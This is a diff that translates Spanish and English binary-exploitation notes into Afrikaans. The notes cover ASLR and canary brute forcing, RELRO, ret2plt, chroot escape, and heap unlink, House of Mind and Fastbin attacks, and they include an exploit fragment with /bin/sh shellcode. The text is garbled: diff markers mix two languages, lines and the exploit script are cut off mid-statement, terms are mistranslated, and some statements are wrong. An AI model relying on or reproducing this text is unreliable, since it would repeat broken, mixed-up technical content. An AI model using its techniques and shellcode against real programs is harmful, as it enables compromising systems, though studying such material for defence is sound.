delta\_stack —> Realmente 11 (del byte 10º al 20º inclusive) —>alineado a 16bytes —> 524.288 posibles direcciones reales del stack +Die stapel —> 24-bits, delta\_stack —> Werklik 11 (vanaf die 10de tot die 20ste byte ingesluit) —> uitgelyn op 16 byte —> 524,288 moontlike werklike stapeladresse -Las variables de entorno y los argumentos se desplazan menos que un buffer en el stack. 
+Die omgewingsveranderlikes en argumente skuif minder as 'n buffer op die stapel. **Return-into-printf** -Es una técnica para convertir un buffer overflow en un error de cadena de formato. Consiste en sustituir el EIP para que apunte a un printf de la función y pasarle como argumento una cadena de formato manipulada para obtener valores sobre el estado del proceso. +Dit is 'n tegniek om 'n buffer-oorloop in 'n formaatfout om te skakel. Dit behels die vervanging van die EIP sodat dit na 'n printf van die funksie verwys en 'n gemanipuleerde formaatstring as argument oorgedra word om waardes oor die toestand van die proses te verkry. -**Ataque a librerías** +**Aanval op biblioteke** -Las librerías están en una posición con 16bits de aleatoriedad = 65636 posibles direcciones. Si un servidor vulnerable llama a fork() el espacio de direcciones de memoria es clocado en el proceso hijo y se mantiene intacto. Por lo que se puede intentar hacer un brute force a la función usleep() de libc pasándole como argumento “16” de forma que cuando tarde más de lo normal en responder se habrá encontrado dicha función. Sabiendo dónde está dicha función se puede obtener delta\_mmap y calcular las demás. +Biblioteke is op 'n posisie met 16-bits willekeurigheid = 65,636 moontlike adresse. As 'n kwesbare bediener fork() aanroep, word die geheue-adresruimte in die kinderproses gekloneer en bly onveranderd. Daarom kan 'n brute force-aanval op die usleep()-funksie van libc probeer word deur "16" as argument oor te dra, sodat as dit langer as normaal neem om te reageer, die funksie gevind is. Deur te weet waar hierdie funksie is, kan delta\_mmap verkry word en die ander bereken word. -La única forma de estar seguros de que el ASLR funciona es usando arquitectura de 64bits. Ahí no hay ataques de fuerza bruta. +Die enigste manier om seker te wees dat ASLR werk, is om 64-bits argitektuur te gebruik. Daar is geen brute force-aanvalle nie. 
-**StackGuard y StackShield** +**StackGuard en StackShield** -**StackGuard** inserta antes del EIP —> 0x000aff0d(null, \n, EndOfFile(EOF), \r) —> Siguen siendo vulnerables recv(), memcpy(), read(), bcoy() y no protege el EBP +**StackGuard** voeg voor die EIP in —> 0x000aff0d(null, \n, EndOfFile(EOF), \r) —> Ontvang steeds aanvalle recv(), memcpy(), read(), bcoy() en beskerm nie die EBP nie -**StackShield** es más elaborado que StackGuard +**StackShield** is meer ingewikkeld as StackGuard -Guarda en una tabla (Global Return Stack) todas las direcciones EIP de vuelta de forma que el overflow no cause ningún daño. Ademas, se pueden comparar ambas direcciones para a ver si ha habido un desbordamiento. +Dit stoor al die terugkeer-EIP-adresse in 'n tabel (Global Return Stack) sodat die oorloop geen skade veroorsaak nie. Daarbenewens kan beide adresse vergelyk word om te sien of daar 'n oorloop was. -También se puede comprobar la dirección de retorno con un valor límite, así si el EIP se va a un sitio distinto del habitual como el espacio de datos se sabrá. Pero esto se sortea con Ret-to-lib, ROPs o ret2ret. +Die terugkeeradres kan ook met 'n limietwaarde vergelyk word, sodat as die EIP na 'n ander plek as die normale soos die data-ruimte gaan, dit bekend sal wees. Maar dit kan omseil word met Ret-to-lib, ROP's of ret2ret. -Como se puede ver stackshield tampoco protege las variables locales. +Soos gesien kan word, beskerm stackshield ook nie die plaaslike veranderlikes nie. **Stack Smash Protector (ProPolice) -fstack-protector** -Se pone el canary antes del EBP. Reordena las variables locales para que los buffers estén en las posiciones más altas y así no puedan sobreescribir otras variables. +Die kanarie word voor die EBP geplaas. Dit herorden die plaaslike veranderlikes sodat die buffers in die hoogste posisies is en dus nie ander veranderlikes oorskryf kan word nie. 
-Además, realiza una copia segura de los argumentos pasados encima de la pila (encima de las vars locales) y usa estas copias como argumentos. +Dit maak ook 'n veilige kopie van die argumente wat bo-op die stapel (bo-op die plaaslike veranderlikes) oorgedra word en gebruik hierdie kopieë as argumente. -No puede proteger arrays de menos de 8 elementos ni buffers que formen parte de una estructura del usuario. - -El canary es un número random sacado de “/dev/urandom” o sino es 0xff0a0000. Se almacena en TLS(Thread Local Storage). Los hilos comparten el mismo espacio de memoria, el TLS es un área que tiene variables globales o estáticas de cada hilo. Sin embargo, en ppio estas son copiadas del proceso padre aunque el proceso hijo podría modificar estos datos sin modificar los del padre ni los de los demás hijos. El problema es que si se usa fork() pero no se crea un nuevo canario, entonces todos los procesos (padre e hijos) usan el mismo canario. En i386 se almacena en gs:0x14 y en x86\_64 se almacena en fs:0x28 - -Esta protección localiza funciones que tengan buffer que puedan ser atacados e incluye en ellas código al ppio de la función para colocar el canario y código al final para comprobarlo. - -La función fork() realiza una copia exacta del proceso del padre, por eso mismo si un servidor web llama a fork() se puede hacer un ataque de fuerza bruta byte por byte hasta averiguar el canary que se está utilizando. - -Si se usa la función execve() después de fork(), se sobreescribe el espacio y el ataque ya no es posible. vfork() permite ejecutar el proceso hijo sin crear un duplicado hasta que el proceso hijo intentase escribir, entonces sí creaba el duplicado. - -**Relocation Read-Only (RELRO)** +Dit kan nie rye van minder as 8 elemente of buffers wat deel is van 'n gebruikersstruktuur beskerm nie. +Die kanarie is 'n willekeurige getal wat uit "dev/urandom" gehaal word, of andersins is dit 0xff0a0000. Dit word in TLS (Thread Local Storage) gestoor. 
Drade deel dieselfde geheue-adresruimte, TLS is 'n area wat globale of statiese veranderlikes van elke draad bevat. In beginsel word hierdie van die ouerproses gekopieer, maar die kinderproses kan ### Relro -**Relro (Read only Relocation)** affects the memory permissions similar to NX. The difference is whereas with NX it makes the stack executable, RELRO makes **certain things read only** so we **can't write** to them. The most common way I've seen this be an obstacle is preventing us from doing a **`got` table overwrite**, which will be covered later. The `got` table holds addresses for libc functions so that the binary knows what the addresses are and can call them. Let's see what the memory permissions look like for a `got` table entry for a binary with and without relro. - -With relro: +**Relro (Read only Relocation)** beïnvloed die geheue toestemmings soortgelyk aan NX. Die verskil is dat terwyl NX die stapel uitvoerbaar maak, maak RELRO **sekere dinge slegs leesbaar** sodat ons nie daaraan kan skryf nie. Die mees algemene manier waarop ek gesien het dat dit 'n struikelblok is, is dat dit ons verhoed om 'n **`got`-tabel oorskrywing** te doen, wat later gedek sal word. Die `got`-tabel bevat adresse vir libc-funksies sodat die binêre weet wat die adresse is en hulle kan aanroep. Kom ons kyk na hoe die geheue toestemmings lyk vir 'n `got`-tabelinskrywing vir 'n binêre met en sonder relro. +Met relro: ```bash gef➤ vmmap Start End Offset Perm Path @@ -626,11 +630,9 @@ $2 = {char *(char *, int, FILE *)} 0x7ffff7e4d100 <_IO_fgets> gef➤ search-pattern 0x7ffff7e4d100 [+] Searching '\x00\xd1\xe4\xf7\xff\x7f' in memory [+] In '/tmp/tryc'(0x555555557000-0x555555558000), permission=r-- - 0x555555557fd0 - 0x555555557fe8 → "\x00\xd1\xe4\xf7\xff\x7f[...]" +0x555555557fd0 - 0x555555557fe8 → "\x00\xd1\xe4\xf7\xff\x7f[...]" ``` - -Without relro: - +Sonder relro: ```bash gef➤ vmmap Start End Offset Perm Path 
@@ -661,215 +663,201 @@ $2 = {char *(char *, int, FILE *)} 0x7ffff7e4d100 <_IO_fgets> gef➤ search-pattern 0x7ffff7e4d100 [+] Searching '\x00\xd1\xe4\xf7\xff\x7f' in memory [+] In '/tmp/try'(0x404000-0x405000), permission=rw- - 0x404018 - 0x404030 → "\x00\xd1\xe4\xf7\xff\x7f[...]" +0x404018 - 0x404030 → "\x00\xd1\xe4\xf7\xff\x7f[...]" ``` +Vir die binêre **sonder relro**, kan ons sien dat die `got` inskrywing adres vir `fgets` `0x404018` is. As ons na die geheue afbeeldings kyk, sien ons dat dit tussen `0x404000` en `0x405000` val, wat die **toestemmings `rw`** het, wat beteken dat ons daaraan kan lees en skryf. Vir die binêre **met relro**, sien ons dat die `got` tabel adres vir die uitvoering van die binêre (pie is geaktiveer, so hierdie adres sal verander) `0x555555557fd0` is. In daardie binêre se geheue afbeelding val dit tussen `0x0000555555557000` en `0x0000555555558000`, wat die geheue **toestemming `r`** het, wat beteken dat ons slegs daarvan kan lees. -For the binary **without relro**, we can see that the `got` entry address for `fgets` is `0x404018`. Looking at the memory mappings we see that it falls between `0x404000` and `0x405000`, which has the **permissions `rw`**, meaning we can read and write to it. For the binary **with relro**, we see that the `got` table address for the run of the binary (pie is enabled so this address will change) is `0x555555557fd0`. In that binary's memory mapping it falls between `0x0000555555557000` and `0x0000555555558000`, which has the memory **permission `r`**, meaning that we can only read from it. +Wat is die **omseiling**? Die tipiese omseiling wat ek gebruik, is om eenvoudig nie na geheue-areas te skryf wat relro veroorsaak om slegs leesbaar te wees nie, en **'n ander manier vind om kodering uit te voer**. -So what's the **bypass**? The typical bypass I use is to just don't write to memory regions that relro causes to be read only, and **find a different way to get code execution**. 
+Let daarop dat die binêre voor die uitvoering die adresse van die funksies moet weet: -Note that in order for this to happen the binary needs to know previous to execution the addresses to the functions: - -* Lazy binding: The address of a function is searched the first time the function is called. So, the GOT needs to have write permissions during execution. -* Bind now: The addresses of the functions are solved at the begginig of the execution, then read-only permissions are given to sensitive sections like .got, .dtors, .ctors, .dynamic, .jcr. `` `** ``-z relro`**`y`**`-z now\`\*\* - -To check if a program uses Bind now you can do: +* Luie binding: Die adres van 'n funksie word die eerste keer gesoek as die funksie geroep word. Dus moet die GOT skryftoestemmings tydens uitvoering hê. +* Bind nou: Die adresse van die funksies word aan die begin van die uitvoering opgelos, waarna slegs leestoestemmings aan sensitiewe afdelings soos .got, .dtors, .ctors, .dynamic, .jcr gegee word. `` `** ``-z relro`**`y`**`-z now\`\*\* +Om te kontroleer of 'n program Bind nou gebruik, kan jy die volgende doen: ```bash readelf -l /proc/ID_PROC/exe | grep BIND_NOW ``` +Wanneer die binêre lêer in die geheue gelaai word en 'n funksie vir die eerste keer geroep word, word daar na die PLT (Procedure Linkage Table) gespring. Van daar af word 'n sprong (jmp) na die GOT gemaak en word besef dat daardie inskrywing nie opgelos is nie (dit bevat 'n volgende adres van die PLT). Dit roep dan die Runtime Linker of rtfd aan om die adres op te los en in die GOT te stoor. -Cuando el binario es cargado en memoria y una función es llamada por primera vez se salta a la PLT (Procedure Linkage Table), de aquí se realiza un salto (jmp) a la GOT y descubre que esa entrada no ha sido resuelta (contiene una dirección siguiente de la PLT). Por lo que invoca al Runtime Linker o rtfd para que resuelva la dirección y la guarde en la GOT. 
+Wanneer 'n funksie geroep word, word die PLT geroep, wat die adres van die GOT bevat waar die funksie se adres gestoor word. Dit stuur die vloei daarheen en roep so die funksie aan. As dit egter die eerste keer is dat die funksie geroep word, is die GOT se inhoud die volgende instruksie van die PLT, dus volg die vloei die PLT-kode (rtfd) en vind die adres van die funksie, stoor dit in die GOT en roep dit aan. -Cuando se llama a una función se llama a la PLT, esta tiene la dirección de la GOT donde se almacena la dirección de la función, por lo que redirige el flujo allí y así se llama a la función. Sin embargo, si es la primera vez que se llama a la función, lo que hay en la GOT es la siguiente instrucción de la PLT, por lo tanto el flujo sigue el código de la PLT (rtfd) y averigua la dirección de la función, la guarda en la GOT y la llama. +By die laai van 'n binêre lêer in die geheue, het die samesteller gesê waar data geplaas moet word wanneer die program uitgevoer word. -Al cargar un binario en memoria el compilador le ha dicho en qué offset tiene que situar datos que se deben de cargar cuando se corre el programa. +Lui binding -> Die adres van die funksie word die eerste keer gesoek wanneer die funksie geroep word, sodat die GOT skryfregte het sodat dit daar gestoor kan word en nie weer gesoek hoef te word nie. -Lazy binding —> La dirección de la función se busca la primera vez que se invoca dicha función, por lo que la GOT tiene permisos de escritura para que cuando se busque, se guarde ahí y no haya que volver a buscarla. +Bind nou -> Die adresse van die funksies word gesoek by die laai van die program en die regte van die .got, .dtors, .ctors, .dynamic, .jcr afdelings word verander na slegs lees. **-z relro** en **-z now** -Bind now —> Las direcciones de las funciones se buscan al cargar el programa y se cambian los permisos de las secciones .got, .dtors, .ctors, .dynamic, .jcr a solo lectura. 
**-z relro** y **-z now** +Ten spyte hiervan is programme in die algemeen nie gekompliseer met hierdie opsies nie, dus bly hierdie aanvalle moontlik. -A pesar de esto, en general los programas no están complicados con esas opciones luego estos ataques siguen siendo posibles. +**readelf -l /proc/ID_PROC/exe | grep BIND_NOW** -> Om te bepaal of BIND_NOW gebruik word -**readelf -l /proc/ID\_PROC/exe | grep BIND\_NOW** —> Para saber si usan el BIND NOW +**Fortify Source -D_FORTIFY_SOURCE=1 of =2** -**Fortify Source -D\_FORTIFY\_SOURCE=1 o =2** +Probeer om funksies te identifiseer wat onveilig kopieer van die een plek na die ander en vervang die funksie met 'n veilige funksie. -Trata de identificar las funciones que copian de un sitio a otro de forma insegura y cambiar la función por una función segura. +Byvoorbeeld:\ +char buf[16];\ +strcpy(buf, source); -Por ej:\ -char buf\[16];\ -strcpy(but, source); +Dit identifiseer dit as onveilig en vervang dan strcpy() met \_\_strcpy\_chk() deur die grootte van die buffer as die maksimum kopieergrootte te gebruik. -La identifica como insegura y entonces cambia strcpy() por \_\_strcpy\_chk() utilizando el tamaño del buffer como tamaño máximo a copiar. +Die verskil tussen **=1** en **=2** is dat: -La diferencia entre **=1** o **=2** es que: +Die tweede staan nie toe dat **%n** van 'n afdeling met skryfregte kom nie. Verder kan die parameter vir direkte toegang tot argumente slegs gebruik word as die vorige gebruik is, dit wil sê, slegs **%3$d** kan gebruik word as **%2$d** en **%1$d** voorheen gebruik is. -La segunda no permite que **%n** venga de una sección con permisos de escritura. 
Además el parámetro para acceso directo de argumentos solo puede ser usado si se usan los anteriores, es decir, solo se pueda usar **%3$d** si antes se ha usado **%2$d** y **%1$d** +Om die foutboodskap te wys, word argv[0] gebruik, dus as dit die adres van 'n ander plek (soos 'n globale veranderlike) bevat, sal die foutboodskap die inhoud van daardie veranderlike wys. Bl. 191 -Para mostrar el mensaje de error se usa el argv\[0], por lo que si se pone en el la dirección de otro sitio (como una variable global) el mensaje de error mostrará el contenido de dicha variable. Pag 191 +**Vervanging van Libsafe** -**Reemplazo de Libsafe** +Dit word geaktiveer met: LD_PRELOAD=/lib/libsafe.so.2\ +of\ +"/lib/libsave.so.2" > /etc/ld.so.preload -Se activa con: LD\_PRELOAD=/lib/libsafe.so.2\ -o\ -“/lib/libsave.so.2” > /etc/ld.so.preload - -Se interceptan las llamadas a algunas funciones inseguras por otras seguras. No está estandarizado. (solo para x86, no para compilaxiones con -fomit-frame-pointer, no compilaciones estaticas, no todas las funciones vulnerables se vuelven seguras y LD\_PRELOAD no sirve en binarios con suid). +Dit onderskep oproepe na sekere onveilige funksies met veilige funksies. Dit is nie gestandaardiseer nie. (slegs vir x86, nie vir samestellings met -fomit-frame-pointer, nie statiese samestellings nie, nie alle kwesbare funksies word veilig gemaak nie, en LD_PRELOAD werk nie vir binêre lêers met suid nie). **ASCII Armored Address Space** -Consiste en cargar las librería compartidas de 0x00000000 a 0x00ffffff para que siempre haya un byte 0x00. Sin embargo, esto realmente no detiene a penas ningún ataque, y menos en little endian. +Dit behels die laai van gedeelde biblioteke vanaf 0x00000000 tot 0x00ffffff sodat daar altyd 'n 0x00 byte is. Dit stop egter baie min aanvalle, veral in little endian. 
**ret2plt** -Consiste en realiza un ROP de forma que se llame a la función strcpy@plt (de la plt) y se apunte a la entrada de la GOT y se copie el primer byte de la función a la que se quiere llamar (system()). Acto seguido se hace lo mismo apuntando a GOT+1 y se copia el 2ºbyte de system()… Al final se llama la dirección guardada en GOT que será system() +Dit behels die uitvoering van 'n ROP (Return-Oriented Programming) sodat die strcpy@plt-funksie (van die plt) geroep word en dit wys na die inskrywing in die GOT en die eerste byte van die funksie wat geroep moet word (system()) gekopieer word. Dan word dieselfde proses gevolg vir GOT+1 en die tweede byte van system() word gekopieer... Uiteindelik word die adres wat in die GOT gestoor is, wat system() sal wees, geroep. -**Falso EBP** +**False EBP** -Para las funciones que usen el EBP como registro para apuntar a los argumentos al modificar el EIP y apuntar a system() se debe haber modificado el EBP también para que apunte a una zona de memoria que tenga 2 bytes cuales quiera y después la dirección a &”/bin/sh”. +Vir funksies wat EBP gebruik as 'n register om na die argumente te wys, moet die EBP ook verander word om na 'n geheuegebied te wys wat enige twee willekeurige bytes bevat en dan die adres van &"/bin/sh". -**Jaulas con chroot()** +**Chroot-kluise** -debootstrap -arch=i386 hardy /home/user —> Instala un sistema básico bajo un subdirectorio específico +debootstrap -arch=i386 hardy /home/user -> Installeer 'n basiese stelsel in 'n spesifieke subgids -Un admin puede salir de una de estas jaulas haciendo: mkdir foo; chroot foo; cd .. +'n Administrateur kan uit een van hierdie kluise ontsnap deur mkdir foo; chroot foo; cd .. te doen. 
-**Instrumentación de código** +**Kode-instrumentasie** -Valgrind —> Busca errores\ +Valgrind -> Soek na foute\ Memcheck\ RAD (Return Address Defender)\ Insure++ -## **8 Heap Overflows: Exploits básicos** +## **8 Heap-oorvloei: Basiese aanvalle** -**Trozo asignado** +**Toegewysde stuk** -prev\_size |\ -size | —Cabecera\ -\*mem | Datos +prev_size |\ +size | -Kop\ +\*mem | Data -**Trozo libre** +**Vry stuk** -prev\_size |\ +prev_size |\ size |\ -\*fd | Ptr forward chunk\ -\*bk | Ptr back chunk —Cabecera\ -\*mem | Datos +\*fd | Wysiger na volgende stuk\ +\*bk | Wysiger na vorige stuk -Kop\ +\*mem | Data -Los trozos libres están en una lista doblemente enlazada (bin) y nunca pueden haber dos trozos libres juntos (se juntan) +Die vry stukke is in 'n dubbelgekoppelde lys (bin) en daar mag nooit twee aangrensende vry stukke wees nie (hulle word saamgevoeg). -En “size” hay bits para indicar: Si el trozo anterior está en uso, si el trozo ha sido asignado mediante mmap() y si el trozo pertenece al arena primario. +In "size" is daar bits om aan te dui: Of die vorige stuk in gebruik is, of die stuk toegewys is deur middel van mmap() en of die stuk behoort tot die primêre arena. -Si al liberar un trozo alguno de los contiguos se encuentra libre , estos se fusionan mediante la macro unlink() y se pasa el nuevo trozo más grande a frontlink() para que le inserte el bin adecuado. +As 'n stuk vrygemaak word en een van die aangrensende stukke is vry, word hulle saamgevoeg deur die unlink() makro en die nuwe grootste stuk word na frontlink() gestuur om dit in die toepaslike bin in te voeg. 
unlink(){\ -BK = P->bk; —> El BK del nuevo chunk es el que tuviese el que ya estaba libre antes\ -FD = P->fd; —> El FD del nuevo chunk es el que tuviese el que ya estaba libre antes\ -FD->bk = BK; —> El BK del siguiente chunk apunta al nuevo chunk\ -BK->fd = FD; —> El FD del anterior chunk apunta al nuevo chunk\ +BK = P->bk; -> Die BK van die nuwe stuk is die een wat die vorige vry stuk gehad het\ +FD = P->fd; -> Die FD van die nuwe stuk is die een wat die vorige vry stuk gehad het\ +FD->bk = BK; -> Die BK van die volgende stuk wys na die nuwe stuk\ +BK->fd = FD; -> Die FD van die vorige stuk wys na die nuwe stuk\ } -Por lo tanto si conseguimos modificar el P->bk con la dirección de un shellcode y el P->fd con la dirección a una entrada en la GOT o DTORS menos 12 se logra: +Dus as ons die P->bk kan verander na die adres van 'n shellcode en die P->fd na die adres van 'n inskrywing in die GOT of DTORS minus 12, word die volgende bereik: -BK = P->bk = \&shellcode\ -FD = P->fd = &\_\_dtor\_end\_\_ - 12\ -FD->bk = BK -> \*((&\_\_dtor\_end\_\_ - 12) + 12) = \&shellcode +BK = P->bk = &shellcode\ +FD = P->fd = &__dtor_end__ - 12\ +FD->bk = BK -> *((&__dtor_end__ - 12) + 12) = &shellcode -Y así se se ejecuta al salir del programa la shellcode. +En dus sal die shellcode uitgevoer word wanneer die program afsluit. -Además, la 4º sentencia de unlink() escribe algo y la shellcode tiene que estar reparada para esto: +Verder skryf die 4de instruksie van unlink() iets en die shellcode moet hiervoor aangepas word: -BK->fd = FD -> \*(\&shellcode + 8) = (&\_\_dtor\_end\_\_ - 12) —> Esto provoca la escritura de 4 bytes a partir del 8º byte de la shellcode, por lo que la primera instrucción de la shellcode debe ser un jmp para saltar esto y caer en unos nops que lleven al resto de la shellcode. 
+BK->fd = FD -> *((&shellcode + 8) = (&__dtor_end__ - 12) -> Dit veroorsaak die skryf van 4 byte vanaf die 8ste byte van die shellcode af, dus moet die eerste instruksie van die shellcode 'n jmp wees om hierdie te omseil en na 'n reeks nops te spring wat na die res van die shellcode lei. -Por lo tanto el exploit se crea: - -En el buffer1 metemos la shellcode comenzando por un jmp para que caiga en los nops o en el resto de la shellcode. - -Después de la shell code metemos relleno hasta llegar al campo prev\_size y size del siguiente trozo. En estos sitios metemos 0xfffffff0 (de forma que se sobrescrita el prev\_size para que tenga el bit que dice que está libre) y “-4“(0xfffffffc) en el size (para que cuando compruebe en el 3º trozo si el 2º estaba libre en realidad vaya al prev\_size modificado que le dirá que s´está libre) -> Así cuando free() investigue irá al size del 3º pero en realidad irá al 2º - 4 y pensará que el 2º trozo está libre. Y entonces llamará a **unlink()**. - -Al llamar a unlink() usará como P->fd los primeros datos del 2º trozo por lo que ahí se meterá la dirección que se quieres sobreescribir - 12(pues en FD->bk le sumará 12 a la dirección guardada en FD) . Y en esa dirección introducirá la segunda dirección que encuentre en el 2º trozo, que nos interesará que sea la dirección a la shellcode(P->bk falso). - -**from struct import \*** - -**import os** - -**shellcode = "\xeb\x0caaaabbbbcccc" #jm 12 + 12bytes de relleno** +Dus die aanval word so geskep: +In buffer1 plaas ons die shellcode beginnende met 'n jmp sodat dit na die nops of die res van die shellcode sal spring **shellcode += "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" \\** **"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" \\** **"\x80\xe8\xdc\xff\xff\xff/bin/sh";** -**prev\_size = pack("\ Devuelve un puntero a la dirección donde comienza el trozo (mem-8) +p = mem2chunk(mes); —> Gee 'n aanwysing na die adres waar die stuk begin (mem-8) … 
@@ -889,11 +877,11 @@ ar\_ptr = arena\_for\_chunk(p); —> chunk\_non\_main\_arena(ptr)?heap\_for\_ptr } -En \[1] comprueba el campo size el bit NON\_MAIN\_ARENA, el cual se puede alterar para que la comprobación devuelva true y ejecute heap\_for\_ptr() que hace un and a “mem” dejando a 0 los 2.5 bytes menos importantes (en nuestro caso de 0x0804a000 deja 0x08000000) y accede a 0x08000000->ar\_ptr (como si fuese un struct heap\_info) +In \[1] word die size-veld en die NON\_MAIN\_ARENA-bit nagegaan, wat verander kan word sodat die toets waar is en heap\_for\_ptr() uitgevoer word. Dit doen 'n and met "mem" en stel die minst belangrike 2.5 byte op 0 (in ons geval van 0x0804a000 na 0x08000000) en kry toegang tot 0x08000000->ar\_ptr (asof dit 'n struct heap\_info is). -De esta forma si podemos controlar un trozo por ejemplo en 0x0804a000 y se va a liberar un trozo en **0x081002a0** podemos llegar a la dirección 0x08100000 y escribir lo que queramos, por ejemplo **0x0804a000**. Cuando este segundo trozo se libere se encontrará que heap\_for\_ptr(ptr)->ar\_ptr devuelve lo que hemos escrito en 0x08100000 (pues se aplica a 0x081002a0 el and que vimos antes y de ahí se saca el valor de los 4 primeros bytes, el ar\_ptr) +Op hierdie manier, as ons byvoorbeeld 'n stuk kan beheer in 0x0804a000 en 'n stuk in **0x081002a0** vrygestel word, kan ons na die adres 0x08100000 gaan en skryf wat ons wil, byvoorbeeld **0x0804a000**. Wanneer hierdie tweede stuk vrygestel word, sal dit vind dat heap\_for\_ptr(ptr)->ar\_ptr die waarde bevat wat ons in 0x08100000 geskryf het (want dit pas die and toe wat ons vroeër gesien het en kry die waarde van die eerste 4 byte, die ar\_ptr). -De esta forma se llama a \_int\_free(ar\_ptr, mem), es decir, **\_int\_free(0x0804a000, 0x081002a0)**\ +Op hierdie manier word \_int\_free(ar\_ptr, mem) geroep, dit wil sê, **\_int\_free(0x0804a000, 0x081002a0)**\ **\_int\_free(mstate av, Void\_t\* mem){**\ …\ bck = unsorted\_chunks(av);\ 
@@ -905,98 +893,87 @@ fwd->bk = p; ..} -Como hemos visto antes podemos controlar el valor de av, pues es lo que escribimos en el trozo que se va a liberar. +Soos ons vroeër gesien het, kan ons die waarde van av beheer, want dit is wat ons in die vrygestelde stuk skryf. -Tal y como se define unsorted\_chunks, sabemos que:\ +Soos unsorted\_chunks gedefinieer word, weet ons dat:\ bck = \&av->bins\[2]-8;\ fwd = bck->fd = \*(av->bins\[2]);\ fwd->bk = \*(av->bins\[2] + 12) = p; -Por lo tanto si en av->bins\[2] escribimos el valor de \_\_DTOR\_END\_\_-12 en la última instrucción se escribirá en \_\_DTOR\_END\_\_ la dirección del segundo trozo. +Dus as ons die waarde van \_\_DTOR\_END\_\_-12 in av->bins\[2] skryf, sal dit uiteindelik in \_\_DTOR\_END\_\_ geskryf word as die adres van die tweede stuk. -Es decir, en el primer trozo tenemos que poner al inicio muchas veces la dirección de \_\_DTOR\_END\_\_-12 porque de ahí la sacará av->bins\[2] +Met ander woorde, in die eerste stuk moet ons die adres van \_\_DTOR\_END\_\_-12 aan die begin plaas, want dit is waar av->bins\[2] dit sal kry. -En la dirección que caiga la dirección del segundo trozo con los últimos 5 ceros hay que escribir la dirección a este primer trozo para que heap\_for\_ptr() piense que el ar\_ptr está al inicio del primer trozo y saque de ahí el av->bins\[2] - -En el segundo trozo y gracias al primero sobreescribimos el prev\_size con un jump 0x0c y el size con algo para activar -> NON\_MAIN\_ARENA - -A continuación en el trozo 2 ponemos un montón de nops y finalmente la shellcode - -De esta forma se llamará a \_int\_free(TROZO1, TROZO2) y seguirá las instrucciones para escribir en \_\_DTOR\_END\_\_ la dirección del prev\_size del TROZO2 el cual saltará a la shellcode. - -Para aplicar esta técnica hace falta que se cumplan algunos requerimientos más que complican un poco más el payload. - -Esta técnica ya no es aplicable pues se aplicó casi el mismo parche que para unlink. 
Se comparan si el nuevo sitio al que se apunta también le está apuntando a él. +In die adres waar die adres van die tweede stuk met +Hierdie tegniek is nie meer toepaslik nie, want byna dieselfde pleister as vir unlink is toegepas. Dit vergelyk of die nuwe plek waarna dit wys, ook na hom wys. **Fastbin** -Es una variante de The house of mind +Dit is 'n variasie van The House of Mind. -nos interesa llegar a ejecutar el siguiente código al cuál se llega pasada la primera comprobación de la función \_int\_free() +Ons wil die volgende kode uitvoer wat bereik word na die eerste toetsing van die \_int\_free() funksie: -fb = &(av->fastbins\[fastbin\_index(size)] —> Siendo fastbin\_index(sz) —> (sz >> 3) - 2 +fb = &(av->fastbins\[fastbin\_index(size)] —> Waar fastbin\_index(sz) —> (sz >> 3) - 2 -… +... p->fd = \*fb \*fb = p -De esta forma si se pone en “fb” da dirección de una función en la GOT, en esta dirección se pondrá la dirección al trozo sobrescrito. Para esto será necesario que la arena esté cerca de las direcciones de dtors. Más exactamente que av->max\_fast esté en la dirección que vamos a sobreescribir. +Op hierdie manier, as dit in "fb" geplaas word, gee dit die adres van 'n funksie in die GOT, en op hierdie adres sal die oorskryfde adres geplaas word. Hiervoor is dit nodig dat die arena naby die dtors-adresse is. Meer presies, av->max\_fast moet die adres wees wat ons gaan oorskryf. -Dado que con The House of Mind se vio que nosotros controlábamos la posición del av. +Aangesien ons met The House of Mind gesien het dat ons die posisie van av beheer, as ons die grootteveld instel as 8 + NON\_MAIN\_ARENA + PREV\_INUSE —> fastbin\_index() sal fastbins\[-1] teruggee, wat na av->max\_fast wys. 
-Entones si en el campo size ponemos un tamaño de 8 + NON\_MAIN\_ARENA + PREV\_INUSE —> fastbin\_index() nos devolverá fastbins\[-1], que apuntará a av->max\_fast +In hierdie geval sal av->max\_fast die oorskryfde adres wees (nie waarna dit wys nie, maar daardie posisie sal oorskryf word). -En este caso av->max\_fast será la dirección que se sobrescrita (no a la que apunte, sino esa posición será la que se sobrescrita). +Dit moet ook voldoen dat die aangrensende stuk na die vrygestelde stuk groter as 8 moet wees -> Aangesien ons gesê het dat die grootte van die vrygestelde stuk 8 is, hoef ons net 'n groter grootte as 8 in hierdie valse stuk te plaas (aangesien die shellcode in die vrygestelde stuk sal wees, moet ons 'n jmp aan die begin plaas wat in nops val). -Además se tiene que cumplir que el trozo contiguo al liberado debe ser mayor que 8 -> Dado que hemos dicho que el size del trozo liberado es 8, en este trozo falso solo tenemos que poner un size mayor que 8 (como además la shellcode irá en el trozo liberado, habrá que poner al ppio un jmp que caiga en nops). +Daarbenewens moet daardie valse stuk kleiner wees as av->system\_mem. av->system\_mem is 1848 byte verder. -Además, ese mismo trozo falso debe ser menor que av->system\_mem. av->system\_mem se encuentra 1848 bytes más allá. +As gevolg van die nulle van \_DTOR\_END\_ en die min adres in die GOT, is geen van hierdie afdrukke geskik om oorskryf te word nie, so laat ons kyk hoe om fastbin toe te pas om die stoor aan te val. -Por culpa de los nulos de \_DTOR\_END\_ y de las pocas direcciones en la GOT, ninguna dirección de estas secciones sirven para ser sobrescritas, así que veamos como aplicar fastbin para atacar la pila. +'n Ander manier van aanval is om die **av** na die stoor te rig. -Otra forma de ataque es redirigir el **av** hacia la pila. +As ons die grootte verander sodat dit 16 in plaas van 8 is, dan sal fastbin\_index() fastbins\[0] teruggee en ons kan dit gebruik om die stoor te oorskryf. 
